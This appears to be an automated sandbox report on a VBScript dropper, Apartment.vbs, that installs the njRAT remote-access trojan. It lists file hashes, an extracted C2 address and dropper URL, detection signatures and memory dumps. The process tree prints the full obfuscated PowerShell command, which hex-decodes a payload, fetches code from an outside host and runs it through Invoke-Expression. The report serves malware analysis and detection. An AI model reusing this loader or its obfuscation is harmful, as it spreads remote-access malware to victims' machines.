Overview

overview

10

Static

static

Apartment.vbs

windows7_x64

10

Apartment.vbs

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    08-09-2021 05:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Apartment.vbs

  • Size

    2KB

  • MD5

    9733443c62fad16ef1c7412f1189b0ea

  • SHA1

    7ffc31b99c0af85be17e8fe1a0d7ffdbfff3af43

  • SHA256

    5eb13a8dd4cc2a1b7a265ab3489b651ceb4679742822bdada781f672dcce9d6e

  • SHA512

    9088b1b27450532f0d509e7dcf14ed9cc22a23f1400c162046d332aad28c7ea0c9c4dff66609d8ec9c941eb3f183ab873b67aa099204ad70d9ac90c90f3e3001

Score
10/10
njratbosssuricatatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://54.184.87.30/dddbypass.txt

Extracted

Family

njrat

Version

v4.0

Botnet

Boss

C2

103.147.184.73:7103

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Apartment.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/dddbypassXXXtxt'.Replace('XXX','.');$Shib='2%###%2###20###3d###27###%5###5%###%8###20###%3###%f###%9###%e###7%###2e###57###5%###%6###20###%3###%f###%9###%e###6c###%9###%f###53###%e###5%###27###2e###52###65###70###6c###61###63###65###28###27###%5###5%###%8###20###%3###%f###%9###%e###27###2c###27###6e###%5###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%6###20###%3###%f###%9###%e###27###2c###27###%5###62###%3###27###29###2e###52###65###70###6c###61###63###65###28###27###%f###53###27###2c###27###65###27###29###3b###2%###%3###%3###20###3d###20###27###%%###%f###53###20###%3###%f###%9###%e###20###%c###53###%f###53###%3###%f###%9###%e###6e###%7###27###2e###52###65###70###6c###61###63###65###28###27###53###20###%3###%f###%9###%e###20###27###2c###27###57###6e###27###29###2e###52###65###70###6c###61###63###65###28###27###53###%f###27###2c###27###6f###61###%%###27###29###2e###52###65###70###6c###61###63###65###28###27###%3###%f###%9###%e###27###2c###27###5%###72###%9###27###29###3b###2%###%1###20###3d###27###%9###60###%5###6f###73###20###%3###%f###%9###%e###60###57###60###%2###5%###%3###20###%3###%f###%9###%e###6a###60###%5###5%###%8###20###%3###%f###%9###%e###20###2%###%2###29###2e###2%###%3###%3###28###2%###5%###52###55###%d###50###29###27###2e###52###65###70###6c###61###63###65###28###27###6f###73###20###%3###%f###%9###%e###27###2c###27###58###28###6e###60###65###27###29###2e###52###65###70###6c###61###63###65###28###27###%2###5%###%3###20###%3###%f###%9###%e###27###2c###27###2d###%f###62###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%8###20###%3###%f###%9###%e###27###2c###27###60###63###60###5%###27###29###3b###26###28###27###%9###27###2b###27###%5###58###27###29###28###2%###%1###20###2d###%a###6f###69###6e###20###27###27###29###7c###26###28###27###%9###27###2b###27###%5###58###27###29###3b'.Replace('%','4');Invoke-Expression (-join ($Shib -split '###' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3512

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1352-115-0x0000000000000000-mapping.dmp
    Download
  • memory/1352-120-0x00000199E0950000-0x00000199E0951000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1352-124-0x00000199E0A30000-0x00000199E0A32000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-125-0x00000199E0A33000-0x00000199E0A35000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-126-0x00000199E17F0000-0x00000199E17F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1352-131-0x00000199E0A36000-0x00000199E0A38000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-142-0x00000199E0A38000-0x00000199E0A39000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1352-153-0x00000199E09A0000-0x00000199E09A4000-memory.dmp
    Filesize

    16KB

    Download
  • memory/3512-154-0x0000000000400000-0x000000000040E000-memory.dmp
    Filesize

    56KB

    Download
  • memory/3512-155-0x000000000040836E-mapping.dmp
    Download
  • memory/3512-159-0x00000000053B0000-0x00000000053B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3512-160-0x0000000005FB0000-0x0000000005FB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3512-161-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3512-162-0x0000000005B60000-0x0000000005B61000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3512-163-0x0000000005B30000-0x0000000005B31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3512-164-0x0000000005DA0000-0x0000000005DA1000-memory.dmp
    Filesize

    4KB

    Download